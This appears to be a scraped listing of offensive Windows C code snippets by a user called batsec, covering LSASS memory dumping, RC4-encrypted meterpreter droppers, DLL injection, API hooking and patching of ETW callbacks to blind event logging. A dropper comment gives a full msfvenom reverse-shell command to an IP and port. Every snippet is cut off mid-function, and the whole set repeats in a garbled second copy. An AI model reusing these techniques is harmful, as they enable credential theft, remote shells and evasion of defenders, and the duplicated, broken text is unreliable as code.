batsec bats3c

## dumplsass.c
#include <stdio.h>
#include <windows.h>
#include <dbghelp.h>
#include <tlhelp32.h>

DWORD findLsass()
{
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
    if(hSnapshot)
    {

## winapi_dropper.c
#include <stdio.h>
#include <windows.h>
#include <wincrypt.h>
#include <tlhelp32.h>

/****************************************************************************************************/
// msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.239 LPORT=4444 -f raw -o meter.bin
// cat meter.bin | openssl enc -rc4 -nosalt -k "HideMyShellzPlz?" > encmeter.bin
// xxd -i encmeter.bin
// x86_64-w64-mingw32-gcc dropper.c -o dropper.exe

## writeprocessmemory_hook.c
#include <stdio.h>
#include <windows.h>

#define BUFFER_FILE ".\\wpm_buffer.bin"

// definitions
typedef WINBOOL (WINAPI * WriteProcessMemory_) (HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten);

char OrgWriteProcMem[50] = {};

## simple_dll_injection.c
VOID InjectDll(DWORD dwPid, LPCVOID lpDllPath)
{
    LPVOID lpBuffer;
    HANDLE hProcess, hThread;

    hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, dwPid);
    if (!hProcess)
    {
        return;
    }

## ldrloaddll_hook.c
#include <stdio.h>
#include <windows.h>
#include <winternl.h>

#define dwAllowDllCount 1
CHAR cAllowDlls[dwAllowDllCount][MAX_PATH] = {
                                                "W:\\allowed.dll"
                                             };

VOID HookLoadDll(LPVOID lpAddr);

## syscall_dropper.c
#include <stdio.h>
#include <windows.h>
#include <wincrypt.h>
#include <tlhelp32.h>
#include <ntdef.h>
#include <winternl.h>

#include "main.h"

/****************************************************************************************************/

## locate_wevtsvc_base_address.c
DWORD_PTR dwBase;
DWORD     i, dwSizeNeeded;
HMODULE   hModules[102400];
TCHAR     szModule[MAX_PATH];

if (EnumProcessModules(GetCurrentProcess(), hModules, sizeof(hModules), &dwSizeNeeded))
{
	for (int i = 0; i < (dwSizeNeeded / sizeof(HMODULE)); i++)
	{
		ZeroMemory((PVOID)szModule, MAX_PATH);

## pattern_search_etwcallback.c
#define PATTERN "\x48\x83\xec\x38\x4c\x8b\x0d"

DWORD i;
LPVOID lpCallbackOffset;

for (i = 0; i < 0xfffff; i++)
{
    if (!memcmp((PVOID)(dwBase + i), (unsigned char*)PATTERN, strlen(PATTERN)))
    {
        lpCallbackOffset = (LPVOID)(dwBase + i);

## hook_etw_callback.c
VOID HookEtwCallback()
{
	DWORD oldProtect, oldOldProtect;

	unsigned char boing[] = { 0x49, 0xbb, 0xde, 0xad, 0xc0, 0xde, 0xde, 0xad, 0xc0, 0xde, 0x41, 0xff, 0xe3 };

	*(void **)(boing + 2) = &EtwCallbackHook;

	VirtualProtect(lpCallbackOffset, 13, PAGE_EXECUTE_READWRITE, &oldProtect);
	memcpy(lpCallbackOffset, boing, sizeof(boing));

## restore_callback.c
typedef VOID(WINAPI * EtwEventCallback_) (EVENT_RECORD *EventRecord);

VOID DoOriginalEtwCallback( EVENT_RECORD *EventRecord )
{
	DWORD dwOldProtect;

	VirtualProtect(lpCallbackOffset, sizeof(OriginalBytes), PAGE_EXECUTE_READWRITE, &dwOldProtect);
	memcpy(lpCallbackOffset, OriginalBytes, sizeof(OriginalBytes));
	VirtualProtect(lpCallbackOffset, sizeof(OriginalBytes), dwOldProtect, &dwOldProtect);
	#include <stdio.h>
	#include <windows.h>
	#include <dbghelp.h>
	#include <tlhelp32.h>

	DWORD findLsass()
	{
	HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
	if(hSnapshot)
	{
	#include <stdio.h>
	#include <windows.h>
	#include <wincrypt.h>
	#include <tlhelp32.h>

	/****************************************************************************************************/
	// msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.239 LPORT=4444 -f raw -o meter.bin
	// cat meter.bin \| openssl enc -rc4 -nosalt -k "HideMyShellzPlz?" > encmeter.bin
	// xxd -i encmeter.bin
	// x86_64-w64-mingw32-gcc dropper.c -o dropper.exe
	#include <stdio.h>
	#include <windows.h>

	#define BUFFER_FILE ".\\wpm_buffer.bin"

	// definitions
	typedef WINBOOL (WINAPI * WriteProcessMemory_) (HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten);

	char OrgWriteProcMem[50] = {};
	VOID InjectDll(DWORD dwPid, LPCVOID lpDllPath)
	{
	LPVOID lpBuffer;
	HANDLE hProcess, hThread;

	hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, dwPid);
	if (!hProcess)
	{
	return;
	}
	#include <stdio.h>
	#include <windows.h>
	#include <winternl.h>

	#define dwAllowDllCount 1
	CHAR cAllowDlls[dwAllowDllCount][MAX_PATH] = {
	"W:\\allowed.dll"
	};

	VOID HookLoadDll(LPVOID lpAddr);
	DWORD_PTR dwBase;
	DWORD i, dwSizeNeeded;
	HMODULE hModules[102400];
	TCHAR szModule[MAX_PATH];

	if (EnumProcessModules(GetCurrentProcess(), hModules, sizeof(hModules), &dwSizeNeeded))
	{
	for (int i = 0; i < (dwSizeNeeded / sizeof(HMODULE)); i++)
	{
	ZeroMemory((PVOID)szModule, MAX_PATH);
	#define PATTERN "\x48\x83\xec\x38\x4c\x8b\x0d"

	DWORD i;
	LPVOID lpCallbackOffset;

	for (i = 0; i < 0xfffff; i++)
	{
	if (!memcmp((PVOID)(dwBase + i), (unsigned char*)PATTERN, strlen(PATTERN)))
	{
	lpCallbackOffset = (LPVOID)(dwBase + i);
	VOID HookEtwCallback()
	{
	DWORD oldProtect, oldOldProtect;

	unsigned char boing[] = { 0x49, 0xbb, 0xde, 0xad, 0xc0, 0xde, 0xde, 0xad, 0xc0, 0xde, 0x41, 0xff, 0xe3 };

	(void *)(boing + 2) = &EtwCallbackHook;

	VirtualProtect(lpCallbackOffset, 13, PAGE_EXECUTE_READWRITE, &oldProtect);
	memcpy(lpCallbackOffset, boing, sizeof(boing));
	typedef VOID(WINAPI * EtwEventCallback_) (EVENT_RECORD *EventRecord);

	VOID DoOriginalEtwCallback( EVENT_RECORD *EventRecord )
	{
	DWORD dwOldProtect;

	VirtualProtect(lpCallbackOffset, sizeof(OriginalBytes), PAGE_EXECUTE_READWRITE, &dwOldProtect);
	memcpy(lpCallbackOffset, OriginalBytes, sizeof(OriginalBytes));
	VirtualProtect(lpCallbackOffset, sizeof(OriginalBytes), dwOldProtect, &dwOldProtect);